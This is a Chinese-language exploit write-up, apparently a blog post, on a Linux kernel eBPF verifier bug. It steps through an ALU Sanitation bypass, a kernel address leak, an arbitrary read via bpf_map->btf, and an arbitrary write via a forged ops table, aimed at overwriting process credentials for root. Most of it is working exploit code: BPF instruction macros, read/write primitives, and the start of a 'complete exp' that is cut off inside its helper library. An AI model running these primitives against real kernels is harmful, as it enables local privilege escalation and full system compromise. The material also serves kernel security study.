ptr(id=0,off=0,ks=4,vs=8192,imm=0) R10=fp0 fp-8=mmmmmmmm
/* r6=0,var_off=(0x0; 0xffffffff00000000) */

泄露内核基地址:

对于 BPF_MAP_TYPE_ARRAY 类型 的 map 而言,其 wrapper 为 bpf_array 类型(即 bpf_map 内嵌于该结构体中),数据则直接存放在其内部的 value 数组成员当中,因此在查找元素时我们获得的其实是一个指向 bpf_array 内部的指针

1
2
3
4
5
6
7
8
9
10
11
struct bpf_array {
struct bpf_map map;
u32 elem_size;
u32 index_mask;
struct bpf_array_aux *aux;
union {
char value[0] __aligned(8);
void *ptrs[0] __aligned(8);
void __percpu *pptrs[0] __aligned(8);
};
};
  • 因此我们只需要前向读取便能读取到 bpf_map,之后可以通过 bpf_map 的函数表泄露内核地址

理论上我们可以构造寄存器,使 verifier 将负数识别为 “0”,但实际上我们还要突破 ALU Sanitation 的检查:

  • ALU Sanitation 是一个用于运行时动态检测的功能,通过对程序正在处理的实际值进行运行时检查以弥补 verifier 静态分析的不足
  • 核心原理就是在 eBPF 程序中的每一条指令前面都添加上额外的辅助指令
1
2
3
4
5
6
7
8
9
10
11
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
if (issrc) {
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);
insn->src_reg = BPF_REG_AX;
} else {
*patch++ = BPF_ALU64_REG(BPF_AND, off_reg, BPF_REG_AX);
}
  • 其中 aux->alu_limit 为当前指针运算范围,初始时为 “0”,与指针所做的常量运算同步
  • 对于减法而言可读范围为 (ptr - alu_limit, ptr](这里保证了指针的偏移不会为负)

由于我们有运行时为 “1”,但 verifier 认为是 “0” 的寄存器,我们可以这样调整范围:

  • 构造另外一个同样是运行时值为 “1”,但 verifier 认为是 “0” 的寄存器 R8(可以选择直接将 R6 拷贝给 R8)
  • 令 R7 指向 map 第一个元素的第一个字节 value[0]
  • 将 R7 加上 0x1000:R7 = value[0x1000],alu_limit = 0x1000
  • 将 R8 乘上 0x1000:R8 = 0x1000(运行时值)
  • 执行 R7 -= R8,由于 verifier 认为 R8 为 “0”,因此 alu_limit 保持不变,但 R7 实际上已经指回了 value[0]
  • 执行 R7 -= 0x110:R7 = value[-0x110],alu_limit = 0x1000
1
2
3
4
5
6
7
8
9
10
11
12
#define LEAK_MAP_OPS(__map_fd)                             \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x110), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_7), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0)

构造任意读 RAA:

现在我们能够读写 bpf_map 中的数据,我们需要注意其中的 btf 指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
struct bpf_map {
const struct bpf_map_ops *ops ____cacheline_aligned;
struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
void *security;
#endif
enum bpf_map_type map_type;
u32 key_size;
u32 value_size;
u32 max_entries;
u32 map_flags;
int spin_lock_off; /* >=0 valid offset, <0 error */
u32 id;
int numa_node;
u32 btf_key_type_id;
u32 btf_value_type_id;
struct btf *btf;
......
};

当函数 bpf_map_get_info_by_fd 被调用时,程序会通过 btf_obj_id(map->btf) 把 bpf_map->btf->id 拷贝给用户空间

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static int bpf_map_get_info_by_fd(struct file *file,
struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr)
{
struct bpf_map_info __user *uinfo = u64_to_user_ptr(attr->info.info);
struct bpf_map_info info;
u32 info_len = attr->info.info_len;
int err;

......

if (map->btf) {
info.btf_id = btf_obj_id(map->btf);
info.btf_key_type_id = map->btf_key_type_id;
info.btf_value_type_id = map->btf_value_type_id;
}

......

if (copy_to_user(uinfo, &info, info_len) ||
put_user(info_len, &uattr->info.info_len))
return -EFAULT;

return 0;
}

劫持 bpf_map->btf 即可完成 RAA:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#define READ_ARBITRARY_ADDR(__map_fd, __idx)            \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xd0), \
/* write the value into bpf_map->btf */ \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 0), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 0x58), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_1, 0)
  • 前半部分使用相同的方法来绕过 alu_limit,后半部分尝试覆盖 bpf_map->btf(这里的 0x58 是 btf.id 的偏移)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
static size_t read_arbitrary_addr_4_bytes(int map_fd, int idx){
size_t data;
int ret;
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
READ_ARBITRARY_ADDR(map_fd, idx),
BPF_EXIT_INSN()};

ret = run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
if (ret < 0){
return 0;
}

struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};

memset(&info, 0, sizeof(info));
ret = bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
if (ret < 0){
return 0;
}
data = info.btf_id;
return data;
}

size_t read_arbitrary_addr(int map_fd, size_t addr)
{
size_t data;
int key;
size_t value[0x1000];

key = 1;
value[0] = addr;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
key = 2;
value[0] = addr + 4;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
data = read_arbitrary_addr_4_bytes(map_fd, 2);
data <<= 32;
data += read_arbitrary_addr_4_bytes(map_fd, 1);
return data;
}

构造任意写 WAA:

核心思想就是将 bpf_map->ops 覆盖为 bpf_array.value(可控地址),并在 bpf_array.value 上伪造一个 fake ops,将 ops->map_push_elem 替换为 array_map_get_next_key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
{
struct bpf_array *array = container_of(map, struct bpf_array, map);
u32 index = key ? *(u32 *)key : U32_MAX;
u32 *next = (u32 *)next_key;

if (index >= array->map.max_entries) {
*next = 0;
return 0;
}

if (index == array->map.max_entries - 1)
return -ENOENT;

*next = index + 1;
return 0;
}
  • 当 key 小于 map.max_entries - 1 时,key + 1 会被写入到 next_key 当中
  • 如果正常调用 map_get_next_key:只能控制 key 但是 next_key 不能控制
  • 如果通过函数指针 ops->map_push_elem 进行调用:可以控制这两个参数

当我们更新 eBPF map 时,若 map 类型为 BPF_MAP_TYPE_QUEUE 或 BPF_MAP_TYPE_STACK,则函数 bpf_map->ops->map_push_elem 就会被调用,不过在函数 map_update_elem 中还有一个检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static int map_update_elem(union bpf_attr *attr)
{

......

if ((attr->flags & BPF_F_LOCK) &&
!map_value_has_spin_lock(map)) {
err = -EINVAL;
goto err_put;
}

......

return err;
}
1
2
3
4
static inline bool map_value_has_spin_lock(const struct bpf_map *map)
{
return map->spin_lock_off >= 0;
}
  • 若 flags 设置了 BPF_F_LOCK 标志位,则会检查 map->spin_lock_off 是否大于等于 0,因此这里我们还要将该字段改为一个正整数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#define MAKE_ARBITRARY_WRITE_OPS(__map_fd)                  \
/* extend the alu_limit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
/* overwrite spin_lock_off */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xE4), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0x2000), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite max_entries */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x8), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0xffffffff), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite map_type */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xC), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 23), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite the map->ops */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x18), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(2, __map_fd, BPF_REG_4), \
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_4, 0), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, 0)
  • 前半部分使用相同的方法来绕过 alu_limit,后半部分尝试覆盖 bpf_map 中的各个条目:
    • spin_lock_off = 0x2000(绕过 map_update_elem 中的检查)
    • max_entries = 0xffffffff(为了满足 key < map.max_entries 的条件)
    • map_type = 23(BPF_MAP_TYPE_STACK)(为了使 bpf_map->ops->map_push_elem 能被调用)
    • ops = target_addr(设置写入的目标地址)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
void make_arbitrary_write_ops(int map_fd){
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
MAKE_ARBITRARY_WRITE_OPS(map_fd),
BPF_EXIT_INSN()};
int key;
size_t per_ops_ptr, value[0x1000], value_idx;
struct bpf_map_ops *ops_data;

fake_ops_addr = map_addr + 0x110 + MAP_SIZE; /* save fake ops addr into map */

value_idx = 0; /* 读取bpf_map->ops,以保证程序的正常功能 */
for (size_t i = 0; i < sizeof(struct bpf_map_ops); i += 8){
per_ops_ptr = read_arbitrary_addr(map_fd, map_ops_addr + i);
value[value_idx++] = per_ops_ptr;
}

ops_data = (struct bpf_map_ops *)value; /* 覆写bpf_map->ops->map_push_elem */
ops_data->map_push_elem = (void *)(ARRAY_MAP_GET_NEXT_KEY + kernel_offset);
key = 1;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

key = 2;
value[0] = fake_ops_addr;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
}

在获取以上所有组件之后,程序的入侵步骤如下:

  • 泄露 map_ops_addr 计算内核基地址
  • 泄露 map_addr
  • 利用 RAA 扫描内存,泄露 current_task 和 current_cred
  • 覆盖 bpf_map->ops->map_push_elem,为 WAA 做准备
  • 利用 WAA 覆盖 current_cred 并进行提权

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <net/if.h>
#include <linux/if_packet.h>

/* Report a failure: write msg to stdout after the "[x] Run eBPF error: "
 * banner (ANSI red + bold, reset before the message) and end the line. */
static __always_inline void err_print(const char *msg)
{
    fprintf(stdout, "\033[31m\033[1m[x] Run eBPF error: \033[0m%s\n", msg);
}

/*
 * Instruction-builder macros. Each one expands to one struct bpf_insn
 * compound literal (BPF_LD_IMM64_RAW expands to two, comma separated), so
 * they are meant to be listed inside a `struct bpf_insn prog[] = { ... }`
 * initializer.
 */

/* Build one raw instruction from its five fields. */
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM) \
((struct bpf_insn) { \
.code = CODE, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = IMM \
})

/* 64-bit ALU op with a register operand: dst_reg = dst_reg OP src_reg */
#define BPF_ALU64_REG(OP, DST, SRC) \
BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

/* 32-bit variant of BPF_ALU64_REG (instruction class BPF_ALU) */
#define BPF_ALU32_REG(OP, DST, SRC) \
BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_X, DST, SRC, 0, 0)

/* 64-bit ALU op with an immediate operand: dst_reg = dst_reg OP imm32 */
#define BPF_ALU64_IMM(OP, DST, IMM) \
BPF_RAW_INSN(BPF_ALU64 | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

/* 32-bit variant of BPF_ALU64_IMM (instruction class BPF_ALU) */
#define BPF_ALU32_IMM(OP, DST, IMM) \
BPF_RAW_INSN(BPF_ALU | BPF_OP(OP) | BPF_K, DST, 0, 0, IMM)

/* 64-bit register move: dst_reg = src_reg */
#define BPF_MOV64_REG(DST, SRC) \
BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_X, DST, SRC, 0, 0)

/* 32-bit register move (instruction class BPF_ALU) */
#define BPF_MOV32_REG(DST, SRC) \
BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_X, DST, SRC, 0, 0)

/* 64-bit immediate move: dst_reg = imm32 */
#define BPF_MOV64_IMM(DST, IMM) \
BPF_RAW_INSN(BPF_ALU64 | BPF_MOV | BPF_K, DST, 0, 0, IMM)

/* 32-bit immediate move (instruction class BPF_ALU) */
#define BPF_MOV32_IMM(DST, IMM) \
BPF_RAW_INSN(BPF_ALU | BPF_MOV | BPF_K, DST, 0, 0, IMM)

/*
 * 64-bit immediate load. Occupies TWO instruction slots: the first carries
 * the low 32 bits of IMM, the second (all other fields zero) the high 32 bits.
 */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \
BPF_RAW_INSN(BPF_LD | BPF_DW | BPF_IMM, DST, SRC, 0, (uint32_t) (IMM)),\
BPF_RAW_INSN(0, 0, 0, 0, ((uint64_t) (IMM)) >> 32)

/* BPF_LD_IMM64_RAW with src_reg = 0, i.e. a plain 64-bit constant */
#define BPF_LD_IMM64(DST, IMM) \
BPF_LD_IMM64_RAW(DST, 0, IMM)

/* Fallback for headers that do not provide BPF_PSEUDO_MAP_FD */
#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD 1
#endif

/* pseudo BPF_LD_IMM64 insn used to refer to process-local map_fd */
#define BPF_LD_MAP_FD(DST, MAP_FD) \
BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

/* Direct packet access, R0 = *(uint *) (skb->data + imm32) */
#define BPF_LD_ABS(SIZE, IMM) \
BPF_RAW_INSN(BPF_LD | BPF_SIZE(SIZE) | BPF_ABS, 0, 0, 0, IMM)

/* dst_reg = *(uint *) (src_reg + off16) */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

/* *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, DST, SRC, OFF, 0)

/* Atomic memory op on (dst_reg + off16); OP is carried in the imm field */
#define BPF_ATOMIC_OP(SIZE, OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_STX | BPF_SIZE(SIZE) | BPF_ATOMIC, DST, SRC, OFF, OP)

/* Atomic add, expressed as BPF_ATOMIC_OP with OP = BPF_ADD */
#define BPF_STX_XADD(SIZE, DST, SRC, OFF) \
BPF_ATOMIC_OP(SIZE, BPF_ADD, DST, SRC, OFF)

/* *(uint *) (dst_reg + off16) = imm */
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
BPF_RAW_INSN(BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, DST, 0, OFF, IMM)

/* Conditional jump, 64-bit compare against a register:
 * if (dst_reg OP src_reg) goto pc + off16 */
#define BPF_JMP_REG(OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

/* Same as BPF_JMP_REG but in the BPF_JMP32 class (32-bit compare) */
#define BPF_JMP32_REG(OP, DST, SRC, OFF) \
BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_X, DST, SRC, OFF, 0)

/* Conditional jump, 64-bit compare against an immediate:
 * if (dst_reg OP imm32) goto pc + off16 */
#define BPF_JMP_IMM(OP, DST, IMM, OFF) \
BPF_RAW_INSN(BPF_JMP | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

/* Same as BPF_JMP_IMM but in the BPF_JMP32 class (32-bit compare) */
#define BPF_JMP32_IMM(OP, DST, IMM, OFF) \
BPF_RAW_INSN(BPF_JMP32 | BPF_OP(OP) | BPF_K, DST, 0, OFF, IMM)

/* Program exit */
#define BPF_EXIT_INSN() \
BPF_RAW_INSN(BPF_JMP | BPF_EXIT, 0, 0, 0, 0)

/*
 * Instruction sequence that looks up element __idx of the map referred to by
 * __map_fd and leaves the returned value pointer in __dst_reg.
 *
 * The key is written as an 8-byte store into the stack slot at R10 - 8 and
 * passed to the map_lookup_elem helper in R2, with the map in R1. If the
 * helper returns 0 the program exits immediately; otherwise R0 is copied to
 * __dst_reg and R0 is reset to 0.
 *
 * Registers written directly by this sequence: R0, R1, R2, R9 and __dst_reg.
 * NOTE(review): the helper call presumably also clobbers the remaining
 * caller-saved argument registers - confirm against the BPF calling
 * convention before keeping live values in R3-R5 across this macro.
 */
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#ifndef __user
#define __user
#endif

#ifndef __rcu
#define __rcu
#endif

struct bpf_map;
struct btf;
struct btf_type;
struct bpf_prog;
struct bpf_prog_aux;
struct poll_table_struct;
struct vm_area_struct;
struct bpf_local_storage_map;

/* map is generic key/value storage optionally accessible by eBPF programs */
/*
 * Userspace copy of the kernel's per-map-type operations table: a struct of
 * function pointers followed by BTF and iterator metadata.
 * NOTE(review): field order and count presumably have to match the kernel
 * build this header is used against - verify against that kernel's own
 * definition before relying on sizeof() or on any member offset.
 */
struct bpf_map_ops {
/* funcs callable from userspace (via syscall) */
int (*map_alloc_check)(union bpf_attr *attr);
struct bpf_map *(*map_alloc)(union bpf_attr *attr);
void (*map_release)(struct bpf_map *map, struct file *map_file);
void (*map_free)(struct bpf_map *map);
int (*map_get_next_key)(struct bpf_map *map, void *key, void *next_key);
void (*map_release_uref)(struct bpf_map *map);
void *(*map_lookup_elem_sys_only)(struct bpf_map *map, void *key);
int (*map_lookup_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_lookup_and_delete_batch)(struct bpf_map *map,
const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_update_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);
int (*map_delete_batch)(struct bpf_map *map, const union bpf_attr *attr,
union bpf_attr __user *uattr);

/* funcs callable from userspace and from eBPF programs */
void *(*map_lookup_elem)(struct bpf_map *map, void *key);
int (*map_update_elem)(struct bpf_map *map, void *key, void *value,
uint64_t flags);
int (*map_delete_elem)(struct bpf_map *map, void *key);
int (*map_push_elem)(struct bpf_map *map, void *value, uint64_t flags);
int (*map_pop_elem)(struct bpf_map *map, void *value);
int (*map_peek_elem)(struct bpf_map *map, void *value);

/* funcs called by prog_array and perf_event_array map */
void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
int fd);
void (*map_fd_put_ptr)(void *ptr);
int (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
uint32_t (*map_fd_sys_lookup_elem)(void *ptr);
void (*map_seq_show_elem)(struct bpf_map *map, void *key,
struct seq_file *m);
int (*map_check_btf)(const struct bpf_map *map,
const struct btf *btf,
const struct btf_type *key_type,
const struct btf_type *value_type);

/* Prog poke tracking helpers. */
int (*map_poke_track)(struct bpf_map *map, struct bpf_prog_aux *aux);
void (*map_poke_untrack)(struct bpf_map *map, struct bpf_prog_aux *aux);
void (*map_poke_run)(struct bpf_map *map, uint32_t key,
struct bpf_prog *old, struct bpf_prog *new);

/* Direct value access helpers. */
int (*map_direct_value_addr)(const struct bpf_map *map,
uint64_t *imm, uint32_t off);
int (*map_direct_value_meta)(const struct bpf_map *map,
uint64_t imm, uint32_t *off);
int (*map_mmap)(struct bpf_map *map, struct vm_area_struct *vma);
__poll_t (*map_poll)(struct bpf_map *map, struct file *filp,
struct poll_table_struct *pts);

/* Functions called by bpf_local_storage maps */
int (*map_local_storage_charge)(struct bpf_local_storage_map *smap,
void *owner, uint32_t size);
void (*map_local_storage_uncharge)(struct bpf_local_storage_map *smap,
void *owner, uint32_t size);
struct bpf_local_storage __rcu ** (*map_owner_storage_ptr)(void *owner);

/* map_meta_equal must be implemented for maps that can be
* used as an inner map. It is a runtime check to ensure
* an inner map can be inserted to an outer map.
*
* Some properties of the inner map has been used during the
* verification time. When inserting an inner map at the runtime,
* map_meta_equal has to ensure the inserting map has the same
* properties that the verifier has used earlier.
*/
int (*map_meta_equal)(const struct bpf_map *meta0,
const struct bpf_map *meta1);

/* BTF name and id of struct allocated by map_alloc */
const char * const map_btf_name;
int *map_btf_id;

/* bpf_iter info used to open a seq_file */
const struct bpf_iter_seq_info *iter_seq_info;
};

/* Minimal wrapper for the bpf(2) system call: forwards cmd and attr and
 * always passes the full size of union bpf_attr. Returns the syscall result
 * narrowed to int. */
static __always_inline int bpf(int cmd, union bpf_attr *attr)
{
    long rc = syscall(__NR_bpf, cmd, attr, sizeof(*attr));

    return (int) rc;
}

/*
 * Load an eBPF program through BPF_PROG_LOAD with a "GPL" license string.
 *
 * prog_type   program type (BPF_PROG_TYPE_*)
 * insns       instruction array
 * insn_cnt    number of entries in insns (stored in a 32-bit attr field)
 * log_buf     buffer receiving the verifier log
 * log_buf_sz  size of log_buf in bytes
 * log_level   verifier log verbosity
 *
 * Returns whatever bpf() returns for BPF_PROG_LOAD.
 */
static __always_inline int
bpf_load_prog(unsigned int prog_type, struct bpf_insn *insns, uint64_t insn_cnt,
              char *log_buf, unsigned int log_buf_sz, unsigned int log_level)
{
    union bpf_attr attr;

    /* Zero the WHOLE union explicitly: a designated initializer only
     * guarantees the initialized member, and the kernel rejects requests
     * whose unused attr bytes are non-zero. */
    memset(&attr, 0, sizeof(attr));
    attr.prog_type = prog_type;
    /* go through uintptr_t so the pointer-to-integer cast is well defined
     * regardless of pointer width */
    attr.insns = (uint64_t)(uintptr_t) insns;
    attr.insn_cnt = (uint32_t) insn_cnt;
    attr.license = (uint64_t)(uintptr_t) "GPL";
    attr.log_level = log_level;
    attr.log_buf = (uint64_t)(uintptr_t) log_buf;
    attr.log_size = log_buf_sz;

    return bpf(BPF_PROG_LOAD, &attr);
}

/*
 * Create an eBPF map through BPF_MAP_CREATE.
 *
 * map_type     map type (BPF_MAP_TYPE_*)
 * key_size     size of a key in bytes
 * value_size   size of a value in bytes
 * max_entries  maximum number of entries
 *
 * Returns whatever bpf() returns for BPF_MAP_CREATE.
 */
static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries)
{
    union bpf_attr attr;

    /* Zero the whole union explicitly; a designated initializer does not
     * guarantee that bytes outside the initialized member are cleared. */
    memset(&attr, 0, sizeof(attr));
    attr.map_type = map_type;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;

    return bpf(BPF_MAP_CREATE, &attr);
}

/*
 * Look up one element through BPF_MAP_LOOKUP_ELEM.
 *
 * map_fd  map file descriptor
 * key     pointer to the key
 * value   buffer the kernel copies the value into
 *
 * Returns whatever bpf() returns for BPF_MAP_LOOKUP_ELEM.
 */
static __always_inline int
bpf_map_lookup_elem(int map_fd, const void *key, void *value)
{
    union bpf_attr attr;

    /* Zero the whole union explicitly; a designated initializer does not
     * guarantee that bytes outside the initialized member are cleared. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t)(uintptr_t) key;
    attr.value = (uint64_t)(uintptr_t) value;

    return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

/*
 * Create or update one element through BPF_MAP_UPDATE_ELEM.
 *
 * map_fd  map file descriptor
 * key     pointer to the key
 * value   pointer to the new value
 * flags   update flags forwarded unchanged in attr.flags
 *
 * Returns whatever bpf() returns for BPF_MAP_UPDATE_ELEM.
 */
static __always_inline int
bpf_map_update_elem(int map_fd,const void *key,const void *value,uint64_t flags)
{
    union bpf_attr attr;

    /* Zero the whole union explicitly; a designated initializer does not
     * guarantee that bytes outside the initialized member are cleared. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t)(uintptr_t) key;
    attr.value = (uint64_t)(uintptr_t) value;
    attr.flags = flags;

    return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

/*
 * Delete one element through BPF_MAP_DELETE_ELEM.
 *
 * map_fd  map file descriptor
 * key     pointer to the key to remove
 *
 * Returns whatever bpf() returns for BPF_MAP_DELETE_ELEM.
 */
static __always_inline int
bpf_map_delete_elem(int map_fd, const void *key)
{
